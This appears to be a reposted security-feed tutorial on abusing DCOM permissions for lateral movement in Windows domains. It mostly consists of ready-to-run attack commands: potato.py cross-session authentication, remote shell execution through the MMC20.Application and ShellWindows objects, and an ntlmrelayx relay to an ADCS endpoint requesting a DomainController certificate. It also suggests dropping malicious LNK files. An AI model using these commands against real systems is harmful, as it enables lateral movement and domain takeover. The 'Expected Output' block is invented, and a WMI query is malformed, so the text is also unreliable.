Listen to this Post
When you discover ExecuteDCOM permissions (e.g., via BloodHound) on a server system, exploitation options are limited because most code execution CLSIDs are only available on client systems. However, certain CLSIDs can still be abused with Cross-Session Authentication to achieve incoming computer authentication, such as using potato.py (Reference).
Key Limitations:
- No LDAP relaying (only incoming RPC auth).
- HTTP relaying (e.g., for ADCS attacks) is possible as an alternative to PetitPotam.
- Some CLSIDs allow remote invocation but run as LocalService, preventing network authentication.
Exploitation Methods:
1. Cross-Session Auth via potato.py:
python3 potato.py -clsid {CLSID} -remote <target> -cmd "whoami"
2. LNK File Creation: If direct code execution fails, consider dropping malicious .LNK files.
3. DLL/EXE Reversing: For LocalService execution, analyze exposed COM methods.
You Should Know:
1. Enumerating DCOM Objects
List available COM objects on a remote machine:
Get-CimInstance Win32_DCOMApplication -ComputerName <target> | Select Name, AppID
2. Executing Commands via DCOM
Using MMC20.Application (common for lateral movement):
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<target>"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")
3. Exploiting ShellWindows (Legacy)
If MMC20 is patched, try ShellWindows:
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","<target>"))
$item = $com.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c whoami","C:\Windows\System32",$null,0)
4. HTTP Relaying for ADCS Attacks
If LDAP signing is enforced, relay to ADCS HTTP endpoint:
ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
5. Checking DCOM Permissions
Verify Distributed COM Users group membership:
Get-WmiObject -Query "SELECT FROM Win32_GroupUser WHERE GroupComponent='Win32_Group.Domain=\"<domain>\",Name=\"Distributed COM Users\"'"
What Undercode Say:
DCOM abuse remains a powerful lateral movement technique, but modern defenses (e.g., COMSecurity, LDAP Signing) reduce its effectiveness. Focus on:
– Alternative CLSIDs (e.g., Excel.Application, ShellBrowserWindow).
– NTLM relaying when DCOM fails.
– LNK/Scheduled Task attacks for indirect execution.
Expected Output:
[+] Successfully executed command via MMC20.Application [+] Relay attack against ADCS HTTP endpoint completed [+] LocalService exploitation requires manual DLL analysis
References:
Reported By: UgcPost 7313105854126325760 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass â
